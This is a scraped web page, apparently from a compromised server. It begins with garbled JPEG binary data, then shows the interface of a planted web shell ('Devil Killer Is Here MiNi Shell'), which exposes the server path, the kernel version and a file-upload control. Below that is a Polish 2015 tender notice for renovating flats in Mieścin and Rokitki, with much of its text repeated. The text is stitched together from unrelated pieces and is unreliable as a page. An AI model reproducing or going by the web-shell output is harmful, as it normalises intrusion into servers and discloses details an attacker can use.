JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150514/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150514/113242-N-2015.html

<p class="kh_header"><b>Pruszcz Gdański: Remont mieszkań w miejscowości Mieścin 6A/3 gm. Tczew gm. oraz w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew</b><br>
<b>Numer ogłoszenia: 113242 - 2015; data zamieszczenia: 14.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku , ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 3004841, 3023817, faks 058 3004843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont mieszkań w miejscowości Mieścin 6A/3 gm. Tczew gm. oraz w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontu mieszkania w miejscowości Mieścin 6A/3 gm. Tczew działka nr 136 zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz 
wykonanie remontu mieszkania w budynku mieszkalnym wielorodzinnym w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew działka nr 156 wraz z montażem 3 wkładów kominowych o długości 2 kondygnacji i poddasza oraz wykonaniem odwiertów w celu wentylacji pustki powietrznej zgodnie z projektem budowlanym i specyfikacją techniczną wykonania i odbioru robót budowlanych. 
1.1. Przedmiot zamówienia został podzielony na dwie części:
Część 1: Wykonanie remontu mieszkania w miejscowości Mieścin 6A/3 gm. Tczew, działka nr 136 zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, 
Zakres robót: 
1)	wymiana okien drewnianych na nowe z PCV,
2)	wymiana na nowe drzwi wewnętrzne i zewnętrzne,
3)	naprawa podłóg - posadzki betonowe pokryte wykładziną PCV,
4)	wymiana instalacji elektrycznej na nową miedzianą,
5)	remont instalacji c.o., wod-kan,
6)	naprawa uszkodzonego obicia ścian w tym wymiana na płyty GK,
7)	naprawa pokrycia dachowego, 
8)	adaptacja pomieszczenia na łazienkę z WC.


Część 2: Wykonanie robót budowlanych remontowych polegających na remoncie mieszkania w budynku mieszkalnym wielorodzinnym w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew działka nr 156 wraz z montażem 3 wkładów kominowych o długości 2 kondygnacji i poddasza oraz wykonaniem odwiertów w celu wentylacji pustki powietrznej zgodnie z projektem budowlanym ze specyfikacją techniczną wykonania i odbioru robót budowlanych. 

Zakres robót: 
1)	remont pomieszczeń poprzez odgrzybienie ścian, odnowa powłok malarskich,
2)	przestawienie pieca,
3)	wykonanie drabiny na dach,
4)	wykonanie dojścia do komina,
5)	wyprowadzenie istniejącej wentylacji nad dach.

1.2 Warunki techniczne:
1)	Przedmiot zamówienia musi być wykonany zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, sztuką budowlaną, przy zachowaniu optymalizacji wykonania.
2)	Plac budowy winien być oznakowany tablicą informacyjną zgodnie z wymogami Prawa budowlanego.
3)	Teren budowy należy zabezpieczyć przed dostępem osób postronnych. Prace niebezpieczne właściwie oznakować zgodnie z przepisami bhp.
4)	Za wypadki i szkody powstałe na placu budowy odpowiada Wykonawca. Wykonawca przyjmuje na siebie odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych.
5)	Wykonawca jest zobowiązany przestrzegać przepisów wynikających z Prawa budowlanego. 
6)	W czasie realizacji robót Wykonawca nie będzie utrudniał mieszkańcom i instytucjom dojazdu, będzie utrzymywał na swój koszt i ryzyko teren robót w stanie wolnym od przeszkód komunikacyjnych oraz będzie usuwał wszelkie zbędne materiały, odpady oraz niepotrzebne urządzenia prowizoryczne.
7)	Wykonawca powinien dokonać wizji lokalnej terenu i jego otoczenia, a także zdobyć na własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą posłużyć do przygotowania oferty, zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu ponosi Wykonawca.

1.3 W kosztach oferty oprócz robót zasadniczych należy ująć: 
1)	poniesienie wszystkich kosztów związanych z odbiorami robót,
2)	wykonanie odpowiednich zabezpieczeń bhp i barier ochronnych,
3)	sporządzenie i aktualizacja planu bioz, tablicy budowy i tablicy informacyjnej,
4)	poniesienie kosztów zajęcia pasa drogi, kosztów zajęć niezbędnych działek sąsiednich - jeśli zajdzie taka potrzeba, 
5)	koszt wykonania dokumentacji powykonawczej,
6)	koszty uczestniczenia w naradach i odbiorach, 
7)	koszty utrzymania placu budowy i uporządkowanie terenu po pracach wraz uzyskaniem mediów na czas budowy i prowadzenia gospodarki odpadami zgodnie z obowiązującymi przepisami, 
8)	dokonania pomiarów instalacji elektrycznych,
9)	uzyskanie pozytywnej opinii kominiarskiej po remoncie kominów, 
10)	Koszty usunięcia odpadów w sposób zgodny z ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz.U. z 8 stycznia 2013r. poz. 21) oraz ustawą o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 roku (Dz. U z 2012 r, poz. 391, z późn. zm.). 

1.4 Istotne dla stron postanowienia zostały zawarte w projekcie umowy stanowiącym załącznik nr 7 do  SIWZ
Przedmiotem zamówienia jest wykonanie remontu mieszkania w miejscowości Mieścin 6A/3 gm. Tczew działka nr 136 zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz 
wykonanie remontu mieszkania w budynku mieszkalnym wielorodzinnym w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew działka nr 156 wraz z montażem 3 wkładów kominowych o długości 2 kondygnacji i poddasza oraz wykonaniem odwiertów w celu wentylacji pustki powietrznej zgodnie z projektem budowlanym i specyfikacją techniczną wykonania i odbioru robót budowlanych. 
4.1.1. Przedmiot zamówienia został podzielony na dwie części:
Część 1: Wykonanie remontu mieszkania w miejscowości Mieścin 6A/3 gm. Tczew, działka nr 136 zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, 
Zakres robót: 
1)	wymiana okien drewnianych na nowe z PCV,
2)	wymiana na nowe drzwi wewnętrzne i zewnętrzne,
3)	naprawa podłóg - posadzki betonowe pokryte wykładziną PCV,
4)	wymiana instalacji elektrycznej na nową miedzianą,
5)	remont instalacji c.o., wod-kan,
6)	naprawa uszkodzonego obicia ścian w tym wymiana na płyty GK,
7)	naprawa pokrycia dachowego, 
8)	adaptacja pomieszczenia na łazienkę z WC.


Część 2: Wykonanie robót budowlanych remontowych polegających na remoncie mieszkania w budynku mieszkalnym wielorodzinnym w miejscowości Rokitki ul. Kasztanowa 3, gm. Tczew działka nr 156 wraz z montażem 3 wkładów kominowych o długości 2 kondygnacji i poddasza oraz wykonaniem odwiertów w celu wentylacji pustki powietrznej zgodnie z projektem budowlanym ze specyfikacją techniczną wykonania i odbioru robót budowlanych. 

Zakres robót: 
1)	remont pomieszczeń poprzez odgrzybienie ścian, odnowa powłok malarskich,
2)	przestawienie pieca,
3)	wykonanie drabiny na dach,
4)	wykonanie dojścia do komina,
5)	wyprowadzenie istniejącej wentylacji nad dach.

4.1.2 Warunki techniczne:
1)	Przedmiot zamówienia musi być wykonany zgodnie z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót budowlanych, sztuką budowlaną, przy zachowaniu optymalizacji wykonania.
2)	Plac budowy winien być oznakowany tablicą informacyjną zgodnie z wymogami Prawa budowlanego.
3)	Teren budowy należy zabezpieczyć przed dostępem osób postronnych. Prace niebezpieczne właściwie oznakować zgodnie z przepisami bhp.
4)	Za wypadki i szkody powstałe na placu budowy odpowiada Wykonawca. Wykonawca przyjmuje na siebie odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych.
5)	Wykonawca jest zobowiązany przestrzegać przepisów wynikających z Prawa budowlanego. 
6)	W czasie realizacji robót Wykonawca nie będzie utrudniał mieszkańcom i instytucjom dojazdu, będzie utrzymywał na swój koszt i ryzyko teren robót w stanie wolnym od przeszkód komunikacyjnych oraz będzie usuwał wszelkie zbędne materiały, odpady oraz niepotrzebne urządzenia prowizoryczne.
7)	Wykonawca powinien dokonać wizji lokalnej terenu i jego otoczenia, a także zdobyć na własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą posłużyć do przygotowania oferty, zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu ponosi Wykonawca.

4.1.3 W kosztach oferty oprócz robót zasadniczych należy ująć: 
1)	poniesienie wszystkich kosztów związanych z odbiorami robót,
2)	wykonanie odpowiednich zabezpieczeń bhp i barier ochronnych,
3)	sporządzenie i aktualizacja planu bioz, tablicy budowy i tablicy informacyjnej,
4)	poniesienie kosztów zajęcia pasa drogi, kosztów zajęć niezbędnych działek sąsiednich - jeśli zajdzie taka potrzeba, 
5)	koszt wykonania dokumentacji powykonawczej,
6)	koszty uczestniczenia w naradach i odbiorach, 
7)	koszty utrzymania placu budowy i uporządkowanie terenu po pracach wraz uzyskaniem mediów na czas budowy i prowadzenia gospodarki odpadami zgodnie z obowiązującymi przepisami, 
8)	dokonania pomiarów instalacji elektrycznych,
9)	uzyskanie pozytywnej opinii kominiarskiej po remoncie kominów, 
10)	Koszty usunięcia odpadów w sposób zgodny z ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz.U. z 8 stycznia 2013r. poz. 21) oraz ustawą o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 roku (Dz. U z 2012 r, poz. 391, z późn. zm.). 

4.1.4 Istotne dla stron postanowienia zostały zawarte w projekcie umowy stanowiącym załącznik nr 7 do  SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.21.00.00-2, 45.21.13.10-5, 45.33.20.00-3, 45.30.00.00-0, 45.42.00.00-7, 45.43.00.00-0, 45.26.00.00-7, 45.41.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga
posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	składając ofertę na część 1 (Mieścin)- zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje wiedzą i doświadczeniem w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej dwóch robót remontowych lub inwestycyjnych, w skład których wchodziły roboty ogólnobudowlane i instalacji wewnętrznych (elektryczne lub kanalizacyjne lub wodociągowe lub c.o.) o wartości co najmniej 20 tys. zł brutto każda (potwierdzone dowodami określającymi, czy robota ta została wykonana w sposób należyty oraz wskazująca czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona),
Ocena spełnienia warunku oraz weryfikacja zdolności wykonawcy do należytego wykonania udzielanego zamówienia dokonywana będzie na podstawie oświadczenia wykonawcy i dokumentów wymienionych w ust 2.2.3. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony.
b)	składając ofertę na część 2 ( Rokitki)- zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie
oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>składając ofertę na część 1 i 2 (Mieścin i Rokitki)- zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie brała udział w wykonaniu zamówienia, posiadającą: uprawnienia budowlane w specjalności konstrukcyjno - budowlanej do kierowania robotami w zakresie niezbędnym do wykonania przedmiotu zamówienia wydane zgodnie z przepisami ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2013 r. poz. 1409 ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r (Dz. U. z 2014 r., poz. 1278) w sprawie samodzielnych funkcji technicznych w budownictwie. Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych,
dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2008 r., Nr 63, poz. 394).
Ocena spełnienia warunku oraz weryfikacja zdolności wykonawcy do należytego wykonania udzielanego zamówienia dokonywana będzie na podstawie oświadczenia wykonawcy i dokumentów wymienionych w ust 2.2.3. Jeżeli z treści tych dokumentów wynikać będzie, że wykonawca spełnia warunek, zamawiający uzna go za spełniony.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie uszczegóławia warunku i uzna warunek za spełniony na podstawie
oświadczenia złożonego przez wykonawcę zgodnego w treści z załącznikiem 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>składając ofertę na część 1 (Mieścin)-co najmniej dwóch robót remontowych lub inwestycyjnych, w skład których wchodziły roboty ogólnobudowlane i instalacji wewnętrznych (elektryczne lub kanalizacyjne lub wodociągowe lub c.o.) o wartości co najmniej 20 tys. zł brutto każda;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Ofertę stanowi wypełniony i podpisany druk Formularz oferty zgodny w treści z załącznikiem nr 1 do
SIWZ. 2) Jeżeli ofertę składa i podpisuje pełnomocnik, do oferty należy dołączyć stosowne
pełnomocnictwo, jeżeli umocowanie do złożenia oferty nie wynika z innych dokumentów dołączonych do
oferty. W przypadku składania przez wykonawców oferty wspólnej (konsorcjum, spółka cywilna) w
ofercie musi być zamieszczone pełnomocnictwo do reprezentowania wykonawców ubiegających się
wspólnie o udzielenie zamówienia albo do reprezentowania wykonawców w postępowaniu i zawarcia
umowy w sprawie zamówienia publicznego. 3) Jeżeli wykonawca będzie polegać na wiedzy i
doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach
finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z
nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w
trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy
wykonaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b,
odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych
zasobów, chyba że za nieudostepnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Gwarancja na roboty budowlane - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach:
1)	Zmiany terminu realizacji:
a)	z powodu zaistnienia po zawarciu umowy przypadku siły wyższej, przez którą rozumieć się będzie zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć, i któremu nie mogły zapobiec przy zachowaniu należytej staranności i zaistnienia konieczności wydłużenia terminu zakończenia realizacji umowy na skutek zaistnienia siły wyższej. Za siłę wyższa, warunkująca zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe. Interpretację zdarzenia siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót z tego powodu, będzie decydował zamawiający w trakcie realizacji robót, po złożeniu pisemnego wniosku Wykonawcy
b)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
c)	z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami);
2)	Zmiany osobowe: zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się, co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 83-000 Pruszcz Gdański, ul. Powstańców Warszawy 28.</p>
